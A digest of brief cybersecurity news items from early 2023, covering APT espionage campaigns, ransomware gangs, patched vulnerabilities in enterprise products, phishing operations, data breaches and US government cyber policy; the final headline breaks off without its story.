    An advanced hacking group named 'Winter Vivern' targets European government organizations and telecommunication service providers to conduct espionage. The group's activities align with the interests of the Russian and Belarusian governments, so it is believed that this is a pro-Russian APT (advanced persistent threat) group. Sentinel Labs reports that the threat group functions on limited resources; however, their creativity compensates for these limitations.

    Veeam Backup & Replication CVE-2023-27532 Exploit Created

    On 7 March 2023, Veeam published a knowledge base article outlining CVE-2023-27532, a vulnerability in the Veeam Backup & Replication component that allowed an unauthenticated user to retrieve host credentials stored in the configuration database. This weakness could ultimately enable an attacker to gain access to hosts and devices managed by the Veeam Backup server. With access to the open TCP port 9401, any individual could obtain credentials and potentially move laterally throughout the network with the newly exposed username and passwords.

    US SEC Amps Up Regulatory Proposals for Market Cybersecurity

    The Securities and Exchange Commission proposed a slew of new cybersecurity rules for the companies underpinning the U.S. stock market, the latest sign of increasing unhappiness among Biden administration officials about the private sector's management of digital risk. The commission approved a proposal that would place market entities under a mandate to report significant cybersecurity incidents to the agency after having concluded with "reasonable basis" that the incident occurred, or even is still in progress.

    Yorotrooper Cyberspies Target CIS Energy Orgs, EU Embassies

    According to researchers, a new group of cybercriminals dubbed Yorotrooper is targeting European Union embassies, Central Asian diplomatic organizations, and energy companies in Ukraine and Kazakhstan. The threat actors access victims' networks through phishing emails containing malicious LNK attachments and decoy PDF documents. Researchers at Cisco Talos observed YoroTrooper exfiltrating significant amounts of data from infected endpoints, along with credentials, cookies, and browsing histories. "While YoroTrooper uses malware associated with other threat actors, such as PoetRAT and LodaRAT, Cisco's analysts have enough indications to believe this is a new cluster of activity.

    Rubrik Confirms Data Theft in GoAnywhere Zero-Day Attack

    Cybersecurity company Rubrik has confirmed that its data was stolen using a zero-day vulnerability in the Fortra GoAnywhere secure file transfer platform. Rubrik is a cloud data management service that offers enterprise data backup and recovery services and disaster recovery solutions. In a statement from Rubrik CISO Michael Mestrovichon, the company disclosed that they were victims of a large-scale attack against GoAnywhere MFT devices worldwide using a zero-day vulnerability.

    US CISA to Warn Critical Infrastructure of Ransomware Risk

    The top U.S. cybersecurity agency says it's testing out scanning critical infrastructure organizations to detect vulnerabilities exploitable by ransomware hackers in a bid to have them patched before extortionists also catch them out. Congress called on the Critical Infrastructure and Security Agency to conduct a pilot scanning for ransomware vulnerabilities in legislation that became law last March. The Ransomware Vulnerability Warning Pilot became active on Jan. 30.

    Exfiltration Malware Takes Center Stage in Cybersecurity Concerns

    SpyCloud has released their 2023 Annual Identity Exposure Report. The report identified over 22 million unique devices infected by malware last year. Of the 721.5 million exposed credentials recovered by SpyCloud, roughly 50% came from botnets, tools commonly used to deploy highly accurate information-stealing malware. The researchers warn of a distinctive spike in malware designed to exfiltrate data directly from devices and browsers, which has led to continued user exposure.

    Critical Patches Issued for Microsoft Products

    Multiple vulnerabilities have been discovered in Microsoft products, the most severe of which could allow for remote code execution in the context of the logged on user. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

    CISA Now Warns Critical Infrastructure of Ransomware-Vulnerable Devices

    Ransomware continues to be a pertinent threat to critical infrastructure with actors leveraging known vulnerabilities to target organizations across the globe. As a countermeasure CISA has announced a new pilot program to help critical infrastructure entities protect their information systems from ransomware attacks. The program dubbed “Ransomware Vulnerability Warning Pilot (RVWP), having started in January 30, 2023, will help organizations identify vulnerabilities in their systems that might by exploited by ransomware threat actors.

    DEV-1101 Enables High-volume AiTM Campaigns with Open-source Phishing Kit

    Adversary-in-the-middle (AiTM) phishing kits are part of an increasing trend that is observed supplanting many other less advanced forms of phishing. AiTM phishing is capable of circumventing multifactor authentication (MFA) through reverse-proxy functionality. DEV-1101 is an actor tracked by Microsoft responsible for the development, support, and advertising of several AiTM phishing kits, which other cybercriminals can buy or rent. The availability of such phishing kits for purchase by attackers is part of the industrialization of the cybercriminal economy and lowers the barrier of entry for cybercrime.

    North Korean Hackers Find Value in LinkedIn

    Business social media platform LinkedIn continues to pay dividends for North Korean hackers, including one group historically concentrated on South Korean targets that has expanded into pursuing security researchers and media industry workers in the West. A Pyongyang group tracked by Google threat intelligence unit Mandiant as UNC2970 masquerades as recruiters on LinkedIn in a bid to entice victims into opening a phishing payload disguised as a job description or skills assessment.

    Cybersecurity Poised for Spending Boost in Biden Budget

    The Biden administration's spending blueprint for the coming federal fiscal year includes increased funding for cybersecurity at federal agencies and for Ukraine. The $1.7 trillion proposal for discretionary federal spending starting Oct. 1 includes $753 million in assistance for Ukraine. The money would be used by Kyiv to "counter Russian malign influence and to meet emerging needs related to security, energy, cybersecurity, disinformation, macroeconomic stabilization, and civil society resilience," a White House budget overview states. Additional budget documents containing more detail are set for release on Monday.

    Medusa Ransomware Gang Picks up Steam as It Targets Companies Worldwide

    The Medusa ransomware gang is gaining momentum as it targets companies worldwide. The group first emerged in 2021 and has been observed utilizing a variety of tactics to compromise organizations, including phishing emails, exploiting vulnerable remote desktop services, and exploiting vulnerabilities in software. Bleeping Computer has analyzed Medusa's encryptor for Windows, but it is not transparent whether or not the group has an encryptor for Linux. The windows encryptor has command-line options that enable the attackers to customize how files get encrypted on infected devices. Additionally, the ransomware terminates over 280 Windows services and processes to prevent interference with file encryption, including services for mail servers, database servers, backup servers, and security software.

    KamiKakaBot Malware Used in Latest Dark Pink APT Attacks on Southeast Asian Targets

    The Dark Pink advanced persistent threat (APT) actor has been linked to a fresh set of attacks targeting government and military entities in Southeast Asian countries with a malware called KamiKakaBot. Dark Pink, also called Saaiwc, was extensively profiled by Group-IB earlier this year, describing its use of custom tools such as TelePowerBot and KamiKakaBot to run arbitrary commands and exfiltrate sensitive information.

    Clop Ransomware Gang Begins Extorting GoAnywhere Zero-Day Victims

    The Clop ransomware gang has begun extorting companies whose data was stolen using a zero-day vulnerability in the Fortra GoAnywhere MFT secure file-sharing solution. In February, the GoAnywhere MFT file transfer solution developers warned customers that a zero-day remote code execution vulnerability was being exploited on exposed administrative consoles. GoAnywhere is a secure web file transfer solution that allows companies to securely transfer encrypted files with their partners while keeping detailed audit logs of who accessed the files.

    Xenomorph Android Malware Now Steals Data From 400 Banks

    The Xenomorph Android malware has upgraded with new capabilities, including an automated transfer system framework and the ability to steal login credentials from 400 banks. The malware was first discovered on the Google Play store in February 2022 with over 50,000 downloads. The latest version of the malware targets financial institutions in the United States, Spain, Turkey, Poland, Australia, Canada, Italy, Portugal, France, Germany, UAE, and India. "Some examples of targeted institutions include Chase, Citibank, American Express, ING, HSBC, Deutsche Bank, Wells Fargo, Amex, Citi, BNP, UniCredit, National Bank of Canada, BBVA, Santander, and Caixa. The list is too extensive to include here, but ThreatFabric has listed all targeted banks in the appendix of its report. Moreover, the malware targets 13 cryptocurrency wallets, including Binance, BitPay, KuCoin, Gemini, and Coinbase.

    Internet Crime in 2022: Over $3 Billion Lost to Investment Scammers

    In 2022, investment scam losses were the most (common or dollar amount) scheme reported to the Internet Crime Complaint Center (IC3),” the FBI shared in its 2022 Internet Crime Report. This category includes crypto-investment scams such as liquidity mining, celebrity impersonation, “pig butchering, “and many more. Business email compromise (BEC) scams are the second most financially destructive overall, followed by tech support scams and personal data breaches.

    Alleged Seller of Netwire RAT Arrested in Croatia

    This week, as part of a global law enforcement operation, federal authorities in Los Angeles successfully confiscated www[.]worldwiredlabs[.]com, a domain utilized by cybercriminals to distribute the NetWire remote access trojan (RAT), allowed perpetrators to assume control of infected computers and extract a diverse range of sensitive information from their unsuspecting victims.

    Microsoft: Business Email Compromise Attacks Can Take Just Hours

    Microsoft’s Security Intelligence team recently investigated a business email compromise (BEC) attack and found that attackers move rapidly, with some steps taking mere minutes. The whole process, from signing in using compromised credentials to registering typosquatting domains and hijacking an email thread, took the threat actors only a couple of hours. This rapid attack progression ensures that the targets will have minimal opportunity to identify signs of fraud and take preventive measures.

    SonicWall SMA Appliance Infected by a Custom Malware Allegedly Developed by Chinese Hacker

    Mandiant researchers reported that alleged China-linked threat actors, tracked as UNC4540, deployed custom malware on a SonicWall SMA appliance. The malware allows attackers to steal user credentials, achieve persistence through firmware upgrades, and provides shell access. The compromised device contained a set of files used by the attacker to gain highly privileged access to the appliance. The code itself contained a variety of bash scripts and a single ELF binary identified as a TinyShell variant.

    Fortinet Plugs Critical RCE Hole in Fortios, Fortiproxy (CVE-2023-25610)

    Fortinet has patched 15 vulnerabilities in a variety of its products, including CVE-2023-25610, a critical flaw affecting devices running FortiOS and FortiProxy. None of the patched vulnerabilities is actively exploited, but Fortinet’s devices are often targeted by ransomware gangs and other cyber attackers, so implementing the offered security updates quickly is advised. Discovered by Fortinet infosec engineer Kai Ni, CVE-2023-25610 is a buffer underwrite (‘buffer underflow’) vulnerability found in the FortiOS and FortiProxy administrative interface. Linux-based FortiOS powers many Fortinet’s products, including its FortiGate firewalls and various switches. FortiProxy is a secure web proxy that protects users against internet-borne attacks.

    Fake ChatGPT Chrome Extension Targeted Facebook Ad Accounts

    ChatGPT has garnered a lot of questions about its security and capacity for manipulation, partly because it is a new software that has seen unprecedented growth (hosting 100 million users just two months following its launch). Security concerns vary from the risk of data breaches to the program writing code on behalf of hackers. From malvertising, extension installation, hijacking Facebook accounts, and back again to propagation The fake ChatGPT extension discovered by Guardio is the latest security concern, affecting thousands daily. The scam starts with the malicious stealer extension, “Quick access to Chat GPT,” showing up on Facebook-sponsored posts as a quick way to get started with ChatGPT directly from your browser.

    FBI Investigates Data Breach Impacting U.S. House Members and Staff

    The FBI is investigating a data breach that has affected US House members and staff. Hackers have gained sensitive personal information from DC Health Link's servers, which administers health plans. The US House Chief Administrative Officer notified impacted individuals via email. The email stated that "DC Health Link suffered a significant data breach yesterday potentially exposing the Personal Identifiable Information (PII) of thousands of enrollees. As a Member or employee eligible for health insurance through D.C. Health Link, your data may have been comprised" (Bleeping Computer, 2023). The scope and severity of the breach are currently unclear, and it does not appear that Members or the House of Representatives were the specific targets of the attack.

    QR Codes: A Growing Vulnerability to Cybercrimes

    QR codes are increasingly being used by cybercriminals in attacks. “Invented in the 1990s, QR codes surged during the pandemic. They offered a way for people to access information and conduct activities in a touchless way. Insider Intelligence reports US smartphone users scanning a QR code will increase from 83.4 million in 2022 to 99.5 million in 2025.

    IceFire Ransomware Now Encrypts Both Linux and Windows Systems

    Threat actors linked to the IceFire ransomware operation now actively target Linux systems worldwide with a new dedicated encryptor. SentinelLabs security researchers found that the gang has breached the networks of several media and entertainment organizations around the world in recent weeks, starting mid-February.

    Emotet Malware Attacks Return After Three-Month Break

    Emotet, a notorious malware active since 2014, has resumed its attacks after a three-month break. The malware gets primarily distributed through phishing emails containing Microsoft word and Excel document attachments utilized for apprehending victims' emails and contacts for use in future Emotet campaigns or downloading additional payloads such as Cobalt Strike or other malware that commonly leads to ransomware attacks.

    US Senators Aim to Block Foreign Tech that Poses Threat

    A dozen U.S. senators on Tuesday introduced bipartisan legislation backed by the White House charging the federal government with initiating a process to systematically block foreign technology from reaching the domestic market when the tech poses a national security threat. Backers say the bill, the Restricting the Emergence of Security Threats that Risk Information Communications Technology Act, could result in restrictions for the social media platform TikTok, which is owned by Chinese company ByteDance. The short form video app has operated under a cloud of Washington, D.C.-driven opposition dating to fears by the Trump administration that TikTok shares data with the Chinese government and could be used in Beijing influence operations.

    New HiatusRAT Router Malware Covertly Spies On Victims

    This campaign is significantly smaller than some of the more prominent botnets such as Emotet or Chaos – both of which indiscriminately target vulnerable devices on the internet. It's been assessed that the threat actor most likely chose to keep the campaign small to evade detection, "As of mid-February 2023, there were approximately 2,700 DrayTek Vigor 2960 routers and approximately 1,400 DrayTek Vigor 3900 routers exposed on the internet, and Hiatus had compromised approximately 100 of these routers.

    Taiwan Suspects Chinese Ships Cut Islands’ Internet Cables

    Matsu, an outlying island close to neighboring China leverages two undersea cables to provide Internet to it’s 14,000 residents. In the past five years, the Island has seen it’s Internet cables cut 27 times. Residents have struggled with paying electricity bills, making doctors appointments, and receiving packages due to the constant destruction of their Internet backbone.

    New Malware Variant has “Radio Silence” Mode to Evade Detection

    The Sharp Panda cyber-espionage hacking group is targeting high-profile government entities in Vietnam, Thailand, and Indonesia with a new version of the ‘Soul’ malware framework. The particular malware was previously seen in espionage campaigns targeting critical Southeast Asian organizations, attributed to various Chinese APTs.

    Russian Disinformation Campaign Records High-Profile Individuals on Camera

    Researchers at Proofpoint have discovered Russian-aligned hackers known as TA499 targeting individuals and organizations through video call requests. TA499 lures prominent business people and individuals who have supported Ukranian humanitarian efforts or have criticized the Russian Government. Threat actors will send fake video conferencing invitations that appear legitimate. The attacks primarily focus on organizations in the United States and Europe.

    Publicity Stunt: Criminals Dump 2 Million Free Payment Cards

    Last week, the credit card market BidenCash, which sells compromised payment card data, released free details of 2 million payment cards. The market for carders - aka credit and debit card thieves - trumpets that the release is intended to celebrate its first anniversary. Whether actual fraudsters find that data dump useful is questionable, the payment cards included in the mess are nearing expiration or are likely already rendered useless by a security alert. BidenCash's leak is more akin to a free food sample you get on a toothpick at the grocery store than a genuine freebie.

    Nvidia Working on Driver Fix for Windows BSOD, High CPU Usage

    Nvidia confirmed today that it's working to fix a driver issue causing high CPU usage and blue screens of death (BSODs) on Windows systems. The buggy driver is the GeForce Game Ready 531.18 WHQL driver released on February 28th that introduced support for RTX Video Super Resolution. This comes after customers have been complaining for days on the company's forums and on social media that the Nvidia Game Session Telemetry Plugin (NvGSTPlugin.dll) loaded by the Nvidia Display Container service leads to CPU spikes of 10% or more on Windows systems after closing games or rendering apps. In the Nvidia forum thread asking for feedback on this driver version, users are also reporting experiencing constant blue screens on up-to-date Windows installations and that reverting to an older driver version fixes the BSOD problems.

    Old Windows ‘Mock Folders’ UAC Bypass Used to Drop Malware

    A new phishing campaign targets organizations in Eastern European countries with the Remcos RAT malware with aid from an old Windows User Account Control (UAC) bypass discovered over two years ago. The use of mock trusted directories to bypass Windows User Account Control stands out in the attack as it's been known since 2020 but remains effective today

    Vulnerability in DJI Drones May Reveal Pilot’s Location

    Serious security vulnerabilities have been identified in multiple DJI drones. These weaknesses had the potential to allow users to modify crucial drone identification details such as its serial number and even bypass security mechanisms that enable authorities to track both the drone and its pilot. In special attack scenarios, the drones could even be brought down remotely in flight.

    Draytek VPN Routers Hacked With New Malware to Steal Data, Evade Detection

    An ongoing hacking campaign called' Hiatus' targets DrayTek Vigor router models 2960 and 3900 to steal data from victims and build a covert proxy network. DrayTek Vigor devices are business-class VPN routers used by small to medium-size organizations for remote connectivity to corporate networks. The new hacking campaign, which started in July 2022 and is still ongoing, relies on three components: a malicious bash script, a malware named "HiatusRAT," and the legitimate 'tcpdump,' used to capture network traffic flowing over the router.

    How to Prevent Microsoft OneNote Files from Infecting Windows with Malware

    Microsoft OneNote file has become a popular file format used by hackers to spread malware and breach corporate networks. Threat actors had previously abused macros in Microsoft Word and Excel, but after Microsoft disabled macros by default, threat actors turned towards other file formats to distribute malware. ISO files and password protected ZIP archives became popular choices.

    CISA Warns That Royal Ransomware Is Picking Up Steam

    The Royal ransomware group targeting critical infrastructure in the United States and other countries is made up of experienced ransomware attackers and has strong similarities to Conti, the infamous Russia-linked hacking group, according to a new alert issued by U.S. authorities. The group is targeting major industries including manufacturing, communications, education and healthcare organizations in the U.S. and other countries, according to a joint advisory from the U.S. Cybersecurity and Infrastructure Security Agency and the FBI. The attackers appear to be particularly interested in hitting the U.S. healthcare sector, demanding ransoms from $250,000 to over $2 million.

    US Government Orders States to Conduct Cyber Security Audits of Public Water Systems

    The Biden administration announced on Friday that it will make it mandatory for states to conduct cyber security audits of public water systems. Water systems are critical infrastructures that are increasingly exposed to the risk of cyberattacks by both cybercriminal organizations and nation-state actors, the US Environmental Protection Agency reported. “Cyberattacks against critical infrastructure facilities, including drinking water systems, are increasing, and public water systems are vulnerable,” said EPA Assistant Administrator Radhika Fox, as reported by the Associated Press. “Cyberattacks have the potential to contaminate drinking water.”

    Phishing Campaign Targets Job Seekers, Employers

    The phishing campaigns target job seekers by sending emails that purport to belong to a recruitment agency, asking them to provide personal information or login credentials. The malware campaign attempts to drop prominent malware like AgentTesla, Emotet, Cryxos Trojans and Nemucod on victims' devices. Trellix researchers also observed that attackers are posing as job seekers to target employers.

    Hatch Bank Discloses Data Breach After GoAnywhere MFT Hack

    Fintech banking platform Hatch Bank has reported a data breach after hackers stole the personal information of almost 140,000 customers from the company's Fortra GoAnywhere MFT secure file-sharing platform. Hatch Bank is a financial technology firm allowing small businesses to access bank services from other financial institutions.

    Over 71k Impacted by Credential Stuffing Attacks on Chick-fil-A Accounts

    American fast food restaurant chain Chick-fil-A has started notifying roughly 71,000 individuals that their user accounts have been compromised in a two-month-long credential stuffing campaign. In a notification letter to impacted customers, a copy of which was submitted to multiple Attorney General offices, Chick-fil-A says the accounts were compromised in a series of automated attacks targeting both its website and mobile application.

    Microsoft Releases Windows Security Updates for Intel CPU Flaws

    Microsoft has released out-of-band security updates for 'Memory Mapped I/O Stale Data (MMIO)' information disclosure vulnerabilities in Intel CPUs. The Mapped I/O side-channel vulnerabilities were initially disclosed by Intel on June 14th, 2022, warning that the flaws could allow processes running in a virtual machine to access data from another virtual machine.

    Investment Scam Network Relies on Massive IT Infrastructure

    Security researchers uncovered an investment scam network that draws on an online infrastructure of hundreds of hosts and thousands of domains to target primarily Indian victims by impersonating Fortune 100 companies. Resecurity dubs the criminal group behind the fraud "Digital Smoke" and says it targeted victims across the globe but focused on India; in 2022, the researchers say, the groups took tens of billions of dollars from victims, and there has been a notable uptick in damages in the first months of this year. Digital Smoke used more than 350 hosting providers, and most domain names and hosting platforms were registered via the Chinese company Alibaba.

    Trezor Warns of Massive Crypto Wallet Phishing Campaign

    Trezor is a hardware cryptocurrency wallet where users can store their crypto offline rather than through cloud-based wallets on their devices. Trezor is a tempting alternative to those who'd rather not have their crypto wallet connected to their PC to avoid malware and compromised devices. However, an ongoing phishing campaign masquerading as Trezor data breach notifications attempts to steal users' cryptocurrency and wallets.

    Cisco Patches Critical Web UI RCE Flaw in Multiple IP Phones

    Cisco recently addressed several vulnerabilities impacting its IP phones which could enable unauthenticated remoted threat actors to execute arbitrary code or cause a denial of service condition. The most severe of the flaws is being tracked as CVE-2023-20078 and can allow an unauthenticated, remote attacker to inject arbitrary commands that are executed with root privileges.

    Russian Government Bans Foreign Messaging Apps

    Russian government officials will no longer be able to use messaging apps developed and run by foreign companies, according to a new law which went into effect yesterday. Parts 8–10 of Article 10 of the new law – On Information, Information Technologies and Information Protection – apply to government agencies and organizations. “The law establishes a ban for a number of Russian organizations on the use of foreign messengers (information systems and computer programs owned by foreign persons that are designed and (or) used for exchanging messages exclusively between their users, in which the sender determines the recipients of messages and does not provide for placement by internet users publicly available information on the internet),” said regulator Roskomnadzor.

    Dish Network Confirms Ransomware Attack Behind Multi-Day Outage

    The satellite broadcaster Dish Network experienced a multi-day network outage. The outage affected multiple services provided by Dish Network, such as Dish[.]com, the dish anywhere app, Boost Mobile, and other websites owned and operated by the provider. At first, Dish Network suspected that the cause of the outage was VPN issues.

    Bitdefender Releases Free Decryptor for MortalKombat Ransomware Strain

    Romanian cybersecurity company Bitdefender has released a free universal decryptor for a nascent file-encrypting malware known as MortalKombat. MortalKombat is a new ransomware strain that emerged in January 2023. It's based on a commodity ransomware dubbed Xorist and has been observed in attacks targeting entities in the U.S., the Philippines, the U.K., and Turkey. Xorist, detected since 2010, is distributed as a ransomware builder, allowing cyber threat actors to create and customize their own version of the malware. This includes the ransom note, the file name of the ransom note, the list of file extensions targeted, the wallpaper to be used, and the extension to be used on encrypted files.

    CISA Warns of Hackers Exploiting ZK Java Framework RCE Flaw

    CISA recently added a new vulnerability to its “Known Exploited Vulnerabilities Catalog.” Tracked as CVE-2022-36537 (CVSSL 7.5), the vulnerability was discovered last year by Markus Wulftange and is related to a remote code execution flaw impacting the ZK Framework versions 9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2 and 8.6.4.1.

    Healthcare Most Hit by Ransomware Last Year, FBI Finds

    Last year, the FBI's Internet Complaint Center received 870 complaints that "indicated organizations belonging to a critical infrastructure sector were victims of a ransomware attack," said David Scott, deputy assistant director of the FBI's Cyber Division, speaking at the Futurescot conference Monday in Glasgow, Scotland. Critical manufacturing and the government, including schools, followed healthcare as the most-attacked sectors, IC3 data shows. The top strain of observed ransomware was LockBit, followed by BlackCat and Hive, IC3 found. "That's just a small portion of the overall ransomware attacks; there are many, many more that didn't impact critical infrastructure," Scott said.

    New Exfiltrator-22 Post-exploitation Kit Linked to Lockbit Ransomware

    Threat actors are promoting a new 'Exfiltrator-22' post-exploitation framework designed to spread ransomware in corporate networks while evading detection. Threat analysts at CYFIRMA claim that this new framework was created by former Lockbit 3.0 affiliates who are experts in anti-analysis and defense evasion, offering a robust solution in exchange for a subscription fee. The prices for Exfiltrator-22 range between $1,000 per month and $5,000 for lifetime access, offering continuous updates and support. Buyers of the framework are given an admin panel hosted on a bulletproof VPS (virtual private server) from where they can control the framework's malware and issue commands to compromised systems.

    Critical Flaws in WordPress Houzez Theme Exploited to Hijack Websites

    Hackers are actively exploiting two critical-severity vulnerabilities in the Houzez theme and plugin for WordPress, two premium add-ons used primarily in real estate websites. The Houzez theme is a premium plugin that costs $69, offering easy listing management and a smooth customer experience. The vendor's site claims it is serving over 35,000 customers in the real estate industry. The two vulnerabilities were discovered by Patchstack's threat researcher Dave Jong and reported to the theme's vendor, 'ThemeForest,' with one flaw fixed in version 2.6.4 (August 2022) and the other in version 2.7.2 (November 2022). However, a new Patchstack report warns that some websites have not applied the security update, and threat actors actively exploit these older flaws in ongoing attacks.

    U.S. Marshals Service Investigating Ransomware Attack, Data Theft

    On February 17, the U.S. Marshals Service suffered a ransomware and data exfiltration event affecting a stand-alone USMS system. The USMS bureau is a federal law enforcement agency operated within the Justice Department. The agency supports all elements of the Federal justice system by providing security for the Federal court facilities, executing federal court orders, apprehending criminals, assuring the safety of government witnesses and their families, and more.

    LastPass: Incident 2 – Additional Attack Details

    LastPass revealed more information on a "coordinated second attack," where a threat actor accessed and stole data from the Amazon AWS cloud storage servers for over two months. LastPass disclosed a breach in December where threat actors stole partially encrypted password vault data and customer information, “The threat actor then exported the native corporate vault entries and content of shared folders, which contained encrypted secure notes with access and decryption keys needed to access the AWS S3 LastPass production backups, other cloud-based storage resources, and some related critical database backups.

    Phone Attacks and MFA Bypass Drive Phishing in 2022

    Security researchers have recorded a 76% year-on-year (YoY) increase in financial losses stemming from phishing attacks, as sophisticated tactics and user knowledge gaps give threat actors the upper hand. Proofpoint compiled its 2023 State of the Phish report from interviews with 7500 consumers and 1050 IT security professionals across 15 counties, as well as 135 million simulated phishing attacks and over 18 million emails reported by customer end users over the past year.

    News Corp Says State Hackers Were on Its Network for Two Years

    Mass media and publishing giant News Corporation (News Corp) says that attackers behind a breach disclosed in 2022 first gained access to its systems two years before, in February 2020. This was revealed in data breach notification letters sent to employees affected by the data breach, who had some of their personal and health information accessed, while the threat actors had access to an email and document storage system used by several News Corp businesses. The incident affected multiple news arms of the publishing conglomerate, including The Wall Street Journal, the New York Post, and its U.K. news operations.

    PureCrypter Malware Hits Govt Orgs With Ransomware, Info-Stealers

    A threat actor has been targeting government entities with PureCrypter malware downloader that has been seen delivering multiple information stealers and ransomware strains. Researchers at Menlo Security discovered that the threat actor used Discord to host the initial payload and compromised a non-profit organization to store additional hosts used in the campaign.’The campaign was found to have delivered several types of malware including Redline Stealer, AgentTesla, Eternity, Blackmoon and Philadelphia Ransomware,’ the researchers say. According to the researchers, the observed PureCrypter campaign targeted multiple government organization in the Asia-Pacific (APAC) and North America regions.

    Ukraine Finds 2-Year-Old Russian Backdoor

    Russian hackers breached and modified several Ukrainian state websites on Thursday morning using a backdoor planted nearly two years ago. The incident did not cause significant disruption, says the State Service of Special Communications and Information Protection of Ukraine. But discovery of an encrypted web shell created no later than Dec. 23, 2021, hiding on the server of an official website led to an investigation revealing several additional backdoors.

    Dozens of Malicious 'HTTP' Libraries Found on PyPI

    Numerous amount of malicious libraries were discovered by researchers at Reversing Labs on the Python PyPi repository. "According to an advisory published Wednesday by Lucija Valentic, a software threat researcher at ReversingLabs, most of the discovered files were malicious packages posing as HTTP libraries. "The descriptions for these packages, for the most part, don't hint at their malicious intent," Valentic explained. "Some are disguised as real libraries and make flattering comparisons between their capabilities and those of known, legitimate HTTP libraries." In particular, the ReversingLabs spotted 41 malicious PyPI packages, which the security researchers divided into two types.

    Ukraine Says Russian Hackers Backdoored Govt Websites in 2021

    The Computer Emergency Response Team of Ukraine (CERT-UA) says Russian state hackers have breached multiple government websites this week using backdoors planted as far back as December 2021. CERT-UA spotted the attacks after discovering a web shell on Thursday morning on one of the hacked websites that the threat actors (tracked as UAC-0056, Ember Bear, or Lorec53) used to install additional malware. This web shell was created in December 2021 and was used to deploy CredPump, HoaxPen, and HoaxApe backdoors one year ago, in February 2022, according to CERT-UA. The threat actors also used the GOST (Go Simple Tunnel) and the Ngrok tools during the early stages of their attack to deploy the HoaxPen backdoor.

    Telus Investigating Leak of Stolen Source Code, Employee Data

    Canada's second-largest telecom, TELUS, is investigating a potential data breach after a threat actor shared samples online of what appears to be employee data. The threat actor subsequently posted screenshots that apparently show private source code repositories and payroll records held by the company.TELUS has so far not found evidence of corporate or retail customer data being stolen and continues to monitor the potential incident. On February 17, a threat actor put up what they claim to be TELUS' employee list (comprising names and email addresses) for sale on a data breach forum.

    Experts Sound Alarm Over Growing Attacks Exploiting Zoho ManageEngine Products

    Multiple threat actors have been observed opportunistically weaponizing a now-patched critical security vulnerability impacting several Zoho ManageEngine products since January 20, 2023. Tracked as CVE-2022-47966 (CVSS score: 9.8), the remote code execution flaw allows a complete takeover of the susceptible systems by unauthenticated attackers. As many as 24 different products, including Access Manager Plus, ADManager Plus, ADSelfService Plus, Password Manager Pro, Remote Access Plus, and Remote Monitoring and Management (RMM), are affected by the issue.

    Microsoft Urges Exchange Admins to Remove Some Antivirus Exclusions

    Microsoft says admins should remove some previously recommended antivirus exclusions for Exchange servers to boost the servers' security. As the company explained, exclusions targeting the Temporary ASP[.]NET Files and Inetsrv folders and the PowerShell and w3wp processes are not required since they're no longer affecting stability or performance. However, admins should make a point out of scanning these locations and processes because they're often abused in attacks to deploy malware.

    Clasiopa Hackers Use New Atharvan Malware in Targeted Attacks

    Symantec Researchers have been tracking a hacking group dubbed Clasiopa. The threat actors have been targeting entities in the materials research sector by employing a remote access trojan called Atharvan. Currently, there is no indication of an initial access vector. However, "Symantec researchers found hints suggesting that Clasiopa uses brute force to gain access to public-facing servers.

    Lazarus Group Using New WinorDLL64 Backdoor to Exfiltrate Sensitive Data

    A new backdoor associated with a malware downloader named Wslink has been discovered, with the tool likely used by the notorious North Korea-aligned Lazarus Group, new findings reveal. The payload, dubbed WinorDLL64 by ESET, is a fully-featured implant that can exfiltrate, overwrite, and delete files; execute PowerShell commands; and obtain comprehensive information about the underlying machine. Its other features comprise listing active sessions, creating and terminating processes, enumerating drives, and compressing directories.

    Fruit Giant Dole Suffers Ransomware Attack Impacting Operations

    Dole Food Company, one of the world’ largest producers and distributors of fresh fruit and vegetables, has announced that it is dealing with a ransomware attack that impacted its operations. There are few details at the moment and the company is currently investigating "the scope of the incident," noting that the impact is limited. The company employs around 38,000 people and has an annual revenue of $6.5 billion. In a statement on its website, Dole says that it has already engaged with third-party experts who help with the remediation and security of impacted systems.

    Researchers Find Hidden Vulnerabilities in Hundreds of Docker Containers

    Research revealed numerous high-severity/critical vulnerabilities hidden in hundreds of popular container images, downloaded billions of times collectively. This includes high-profile vulnerabilities with publicly known exploits. Some of the hidden vulnerabilities are known to be actively exploited in the wild and are part of the CISA known used vulnerabilities catalog, including CVE-2021-42013, CVE-2021-41773, and CVE-2019-17558.

    NSA Shares Guidance on How to Secure Your Home Network

    The U.S. National Security Agency (NSA) has issued guidance to help remote workers secure their home networks and defend their devices from attacks. The guide published by the Defense Department's intelligence agency on Wednesday includes a long list of recommendations, including a short list of highlights urging teleworkers to ensure their devices and software are up to date.

    New Privilege Escalation Bug Class Found on macOS and iOS

    Researchers have discovered six vulnerabilities on macOS and iOS and a new bug class. The new class of privilege escalation bugs, stems from the ForcedEntry attack, which abused a feature of macOS and iOS to distribute Pegasus Malware. The bugs include, various zero-day vulnerabilities similar to the ones exploited in the previous ForcedEntry attack. The bugs allow bypassing code signing to execute arbitrary code in several platforms, leading to escalation of privileges and sandbox escape on macOS and iOs. The CVSS scores of the vulnerabilities range between 5.1 and 7.1.

    CISA adds IBM Aspera Faspex and Mitel MiVoice to Known Exploited Vulnerabilities Catalog

    CISA has added three new vulnerabilities to their Known Exploited Vulnerabilities Catalog. One of which resides in IBM’s Aspera Faspex, and two others in Mitel’s MiVoice.

    • CVE-2022-47986 is a remote execution vulnerability in IBM’s Aspera Faspex and received a CVSS score of 9.8. A remote attacker can use this vulnerability to execute arbitrary code on the system. The vulnerability is the result of a YAML deserialization issue. Shadowserver researchers have confirmed active exploitation of the vulnerability in the wild.
    • CVE-2022-41223 is a code injection vulnerability found in Mitel’s MiVoice Connect. A proof of concept was released by Assetnote earlier this month, and the vulnerability received a 6.8 CVSS score. Using the vulnerability, attackers with internal network access can execute code within the context of the application.
    • CVE-2022-40765 resides in Mitel’s Edge Gateway component of MiVoice Connect. It allows an authenticated attacker with internal network access to execute commands within the context of the system. This also received a CVSS score of 6.8.

    According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog. Experts recommend private organizations also review the Catalog and address the vulnerabilities in their infrastructure.

    Hydrochasma: New Threat Actor Targets Shipping Companies and Medical Labs in Asia

